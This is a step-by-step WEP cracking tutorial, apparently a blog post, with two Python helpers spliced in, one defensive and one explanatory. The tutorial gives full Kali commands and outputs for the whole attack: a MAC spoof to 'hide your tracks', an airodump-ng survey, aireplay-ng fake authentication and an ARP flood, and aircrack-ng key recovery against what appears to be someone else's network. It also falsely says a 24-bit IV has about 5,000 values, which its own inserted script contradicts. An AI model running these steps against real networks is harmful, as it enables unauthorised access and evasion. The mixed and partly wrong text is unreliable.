First you'll want to boot up Backtrack or Kali; you could theoretically use any linux-distro and install the tools separately, but who has time for that. I personally keep Kali on an SD card and boot into live-mode on my laptop when I need it.
Hiding Your Tracks
Because network cracking can get you in trouble, we'll want to hide our MAC address before we begin. BT (I'm going to refer to both Backtrack and Kali as BT from now on) has a nifty tool installed for this called simply macchanger.
airmon-ng stop
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
This will stop airmon-ng from monitoring, shut down your wlan0 interface, change its MAC address to 00:11:22:33:44:55 (how original), then start up the monitoring again. Turning on airmon-ng gives us a virtual interface, mon0, which we will be using from here on out.
Reconnaissance
We'll first want to scan the area within range for available wireless networks. You should see at least a few pop up, as there is an overabundance of wireless networks... everywhere. To start the scan, open up a new terminal and execute airodump-ng. Press Ctrl-C to kill it after you determine it's not going to find any more WLANs.
airodump-ng
CH 7 ][ Elapsed: 48 s ][ 2013-06-01 20:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:22:6B:4D:13:0A -49 119 17 0 6 54 WEP WEP dotscafe
B0:E7:54:A7:B7:A9 -82 56 0 0 11 54 . WEP WEP BELL237
34:EF:44:F8:6D:A9 -88 11 0 0 9 54 . WPA TKIP PSK abby
78:CD:8E:66:3E:51 -89 1 1 0 10 54e WPA TKIP PSK dave
BSSID STATION PWR Rate Lost Frames Probe
00:22:6B:4D:13:0A 60:A1:0A:1E:0B:5D -63 0 -54 0 10
00:22:6B:4D:13:0A 98:0C:82:8A:52:38 -83 1 -24 0 4
B0:E7:54:A7:B7:A9 38:AA:3C:75:83:E3 -83 0 - 1 0 1
Data Collection
As you can see there's a plethora of information about each AP. The things we're most concerned with are the BSSID and the channel (CH) it's operating on. We can run airodump-ng again, this time giving it some specifics. The bell237 in the command is the file name where the traffic capture is going to be dumped; for consistency's sake, I generally keep the file name the same as the ESSID.
airodump-ng -c 11 -w bell237 --bssid B0:E7:54:A7:B7:A9 mon0
CH 11 ][ Elapsed: 2 mins ][ 2013-06-01 21:01
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
B0:E7:54:A7:B7:A9 -78 96 1254 50485 0 11 54 . WEP WEP BELL237
BSSID STATION PWR Rate Lost Frames Probe
B0:E7:54:A7:B7:A9 00:11:22:33:44:55 0 0 - 1 52425 107860
B0:E7:54:A7:B7:A9 28:6A:BA:17:AD:65 -87 0 - 1 0 1
B0:E7:54:A7:B7:A9 38:AA:3C:75:83:E3 -83 11 - 1 0 254
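The two airodump-ng screens above (the open survey and the capture locked on one BSSID) are also the raw material for an owner auditing their own network: which of your APs still advertise WEP or no encryption, and does any single client show the frame count that a replay flood produces. The following parser is an added example written for this page, not code from the original post or from the aircrack-ng project; the sample text is assembled from the screens above plus two made-up APs (AA:BB:CC:DD:EE:xx) so that OPN and WPA2 rows are covered, and the flood thresholds (ratio=50, floor=1000) are my own choice.

```python
import re
import statistics
from dataclasses import dataclass

# Constructed samples, lifted from the two airodump-ng screens above: the open
# survey (no RXQ column) and the capture locked on one BSSID (RXQ present).
# The AA:BB:CC:DD:EE:xx rows are made up to cover OPN and WPA2 output.
SURVEY = """\
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:22:6B:4D:13:0A -49 119 17 0 6 54 WEP WEP dotscafe
34:EF:44:F8:6D:A9 -88 11 0 0 9 54 . WPA TKIP PSK abby
AA:BB:CC:DD:EE:01 -70 40 0 0 1 54e OPN cafe guest
AA:BB:CC:DD:EE:02 -60 80 3 0 6 54e. WPA2 CCMP PSK home-net
"""
LOCKED = """\
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
B0:E7:54:A7:B7:A9 -78 96 1254 50485 0 11 54 . WEP WEP BELL237
BSSID STATION PWR Rate Lost Frames Probe
B0:E7:54:A7:B7:A9 00:11:22:33:44:55 0 0 - 1 52425 107860
B0:E7:54:A7:B7:A9 28:6A:BA:17:AD:65 -87 0 - 1 0 1
B0:E7:54:A7:B7:A9 38:AA:3C:75:83:E3 -83 11 - 1 0 254
"""

MAC = r"(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}"
AUTH_VALUES = {"PSK", "MGT", "OPN", "SKA"}   # values airodump-ng prints in AUTH
STATION_RE = re.compile(
    rf"^(?P<bssid>{MAC}|\(not associated\))\s+(?P<station>{MAC})\s+(?P<pwr>-?\d+)"
    r"\s+(?P<rx>\d+)\s*-\s*(?P<tx>\d+)\s+(?P<lost>\d+)\s+(?P<frames>\d+)(?:\s+(?P<probe>.*))?$"
)

@dataclass
class AccessPoint:
    bssid: str
    channel: int
    data: int      # "#Data" column: IV-carrying data frames for a WEP network
    enc: str
    cipher: str
    auth: str
    essid: str

@dataclass
class Station:
    bssid: str
    station: str
    lost: int
    frames: int

def _parse_ap(tokens, has_rxq):
    # Every column before MB is numeric: PWR [RXQ] Beacons #Data #/s CH.
    n = 6 if has_rxq else 5
    bssid, nums, rest = tokens[0], tokens[1:1 + n], tokens[1 + n:]
    rest.pop(0)                        # MB ("54", "54e", "54e.")
    if rest and rest[0] == ".":        # the QoS dot is sometimes printed detached
        rest.pop(0)
    enc = rest.pop(0)
    cipher = auth = ""
    if enc != "OPN":                   # open networks carry no CIPHER/AUTH
        cipher = rest.pop(0)
        if rest and rest[0] in AUTH_VALUES:   # WEP rows usually leave AUTH blank
            auth = rest.pop(0)
    return AccessPoint(bssid, int(nums[-1]), int(nums[-3]), enc, cipher, auth, " ".join(rest))

def parse_airodump(text):
    """Parse airodump-ng screen text into (access_points, stations)."""
    aps, stations, mode, has_rxq = [], [], None, False
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("BSSID PWR"):          # AP table header
            mode, has_rxq = "ap", "RXQ" in line
        elif line.startswith("BSSID STATION"):    # client table header
            mode = "station"
        elif mode == "ap":
            aps.append(_parse_ap(line.split(), has_rxq))
        elif mode == "station":
            m = STATION_RE.match(line)
            if m:
                stations.append(Station(m["bssid"], m["station"], int(m["lost"]), int(m["frames"])))
    return aps, stations

def weak_networks(aps):
    """(essid, reason) for APs an owner should fix: open, WEP, or WPA with legacy TKIP."""
    findings = []
    for ap in aps:
        if ap.enc == "OPN":
            findings.append((ap.essid, "open network, no encryption"))
        elif ap.enc == "WEP":
            findings.append((ap.essid, "WEP, broken; move to WPA2"))
        elif ap.cipher == "TKIP":
            findings.append((ap.essid, "WPA/TKIP, legacy cipher"))
    return findings

def suspicious_stations(stations, ratio=50, floor=1000):
    """Clients whose frame count dwarfs the other clients of the same AP: one station
    at 107,860 frames next to clients at 1 and 254 is what the flood above looks like."""
    by_bssid = {}
    for s in stations:
        by_bssid.setdefault(s.bssid, []).append(s)
    flagged = []
    for group in by_bssid.values():
        if len(group) < 2:             # need peers to compare against
            continue
        median = statistics.median(s.frames for s in group)
        flagged += [s.station for s in group if s.frames >= floor and s.frames >= ratio * median]
    return flagged

if __name__ == "__main__":
    for text in (SURVEY, LOCKED):
        aps, stations = parse_airodump(text)
        print(weak_networks(aps), suspicious_stations(stations))
```

Feed it the saved screen text (or the `-w` CSV after light conversion) from a scan of your own premises; the station check is deliberately relative, because a busy streaming client also racks up frames, and only a client that is orders of magnitude above its peers is worth a closer look.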
Now at this point, you could just let airodump-ng run and gather the packets on its own. But we both know by looking at how fast that Data number is climbing that it'll be a long wait. To speed things along we're going to associate ourselves with the AP and start a flood. You'll want to leave airodump-ng running while you do this, so open up a new terminal. The -1 option sets the attack mode to fake authentication and the 0 sets the number of packets per burst to auto (the default is 1).
aireplay-ng -1 0 -a B0:E7:54:A7:B7:A9 -h 00:11:22:33:44:55 -e BELL237 mon0
The interface MAC (XX:XX:XX:XX:XX:XX) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:11:22:33:44:55
20:54:05 Waiting for beacon frame (BSSID: B0:E7:54:A7:B7:A9) on channel 11
20:54:05 Sending Authentication Request (Open System) [ACK]
20:54:05 Authentication successful
20:54:05 Sending Association Request [ACK]
20:54:05 Association successful :-) (AID: 1)
Now that we're authenticated we can begin to flood. We'll be flooding ARP requests, which is what the -3 option in our command denotes.
aireplay-ng -3 -b B0:E7:54:A7:B7:A9 -h 00:11:22:33:44:55 mon0
You'll soon see that terminal overflow with ARP requests; just let it go. If we go back to our other terminal where we left airodump-ng running, you'll see the #Data column skyrocket. That number represents the number of IVs (Initialization Vectors) we have collected so far; each WEP data packet carries a 3-byte IV. We'll want to collect a heap of them because the WEP IV is only 24 bits, meaning it'll only have 5000 possibilities. And so the flood has begun. Let it go till it hits about 50,000. When it gets there, you can go ahead and kill both applications (but don't close the windows).
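The reason a few tens of thousands of data frames are enough comes down to the size of that 3-byte IV. The script below is an added illustration for this page, not code from the original post: it treats the IV as a 24-bit value drawn per frame and works the birthday bound through with the page's figures, showing that a sender picking IVs at random is expected to repeat one after roughly 5,100 frames and is all but certain to have done so many times over by the 50,000 mark. The per-frame rate used in the wrap-around helper is a constructed value, not a measurement.

```python
import math
import random

IV_BITS = 24                 # WEP prepends a 24-bit (3-byte) IV to each data frame
IV_SPACE = 1 << IV_BITS      # 16,777,216 distinct IVs


def collision_probability(frames: int, space: int = IV_SPACE) -> float:
    """Exact birthday-problem probability that at least two of `frames`
    uniformly random IVs coincide."""
    p_distinct = 1.0
    for i in range(frames):
        p_distinct *= (space - i) / space
    return 1.0 - p_distinct


def frames_for_probability(p: float, space: int = IV_SPACE) -> int:
    """Smallest frame count whose collision probability reaches p,
    from the usual approximation n ~ sqrt(2 N ln(1/(1-p)))."""
    return math.ceil(math.sqrt(2 * space * math.log(1 / (1 - p))))


def expected_first_collision(space: int = IV_SPACE) -> float:
    """Expected number of frames until the first repeated IV: sqrt(pi N / 2)."""
    return math.sqrt(math.pi * space / 2)


def hours_until_counter_wraps(frames_per_second: float, space: int = IV_SPACE) -> float:
    """An implementation that uses the IV as a simple counter repeats every
    `space` frames; this converts that into hours at a given (constructed) rate."""
    return space / frames_per_second / 3600


def simulate_iv_reuse(frames: int, seed: int = 1, space: int = IV_SPACE):
    """Draw `frames` random IVs, as a non-sequential sender would, and count reuse.
    Returns (index of the first reused IV or None, number of frames that reused one)."""
    rng = random.Random(seed)   # fixed seed so the run is reproducible
    seen = set()
    first, reused = None, 0
    for i in range(frames):
        iv = rng.randrange(space)
        if iv in seen:
            reused += 1
            if first is None:
                first = i
        seen.add(iv)
    return first, reused


if __name__ == "__main__":
    print(f"expected first repeat after ~{expected_first_collision():.0f} frames")
    print(f"50% chance of a repeat by frame {frames_for_probability(0.5)}")
    print(f"P(repeat) over 50,000 frames = {collision_probability(50_000):.6f}")
    print(f"counter-style IV wraps after {hours_until_counter_wraps(500):.1f} h at 500 frames/s")
    first, reused = simulate_iv_reuse(50_000)
    print(f"simulation: first reuse at frame {first}, {reused} reused IVs in 50,000")
```

The takeaway for a network owner is the same one the post closes on: no choice of WEP key length fixes this, because the IV is part of the frame format, so the only remedy is moving the network to WPA2.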
Attack
In one of the two terminals (or a new one if you prefer) we'll need to load our capture file from airodump-ng into aircrack-ng to actually crack the IVs we collected earlier. The IVs are encrypted and aircrack will attempt to run them against a set of statistical attacks. In the event that aircrack fails (and believe me, it can), just go back to the two terminals we were using for airodump and aireplay and run them again, this time until twice as many IVs have been captured (now you know why I told you not to close the windows!).
aircrack-ng -b B0:E7:54:A7:B7:A9 bell237-01.cap
Opening bell237-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50484 ivs.
Aircrack-ng 1.1
[00:00:02] Tested 1388233 keys (got 50338 IVs)
KB depth byte(vote)
0 0/ 1 28(63232) 8A(59136) 2F(58880) 93(58880) F0(58624) 88(58368)
1 0/ 1 55(70656) 12(59648) 21(58880) F8(58880) 9A(58368) CF(58368)
2 0/ 2 07(62464) E4(61696) 9E(60672) 7C(58624) 33(57088) 6E(57088)
3 0/ 1 74(71168) 53(60416) D9(59392) E9(58112) ED(57856) 0E(57344)
4 0/ 1 30(74752) 43(58368) 68(58368) 5C(57600) A2(57600) 52(57088)
5 0/ 1 19(63488) 4D(61184) AC(60928) 05(58624) 5A(58624) 89(58624)
6 0/ 1 75(74752) 29(60160) 4D(59904) 86(59904) 30(59392) 57(58880)
7 2/ 4 B4(60928) 4E(60416) 54(60416) 3E(60160) 47(58368) B8(58112)
8 1/ 3 46(60672) 9F(59904) 05(58880) 27(58624) 2B(58368) BD(58112)
9 0/ 1 48(66048) 86(60160) A2(60160) 32(57856) AE(57600) EE(57600)
10 0/ 1 54(62464) DF(58624) FD(57856) 7A(57600) 46(57344) 0C(56832)
11 0/ 1 64(71936) 48(59392) 11(59136) 66(59136) 86(57600) 88(57600)
12 26/ 12 ED(55040) 83(54784) 90(54784) C4(54784) 05(54528) 14(54528)
KEY FOUND! [ 28:55:07:74:30:19:75:98:46:48:54:64:38 ]
Decrypted correctly: 100%
And that's it! Pop the key (without the colons) into the authentication prompt for the wireless network and you're set. This just shows you how easy it is to get into someone else's LAN; make sure you keep your private network protected with at least WPA and, if possible, WPA2.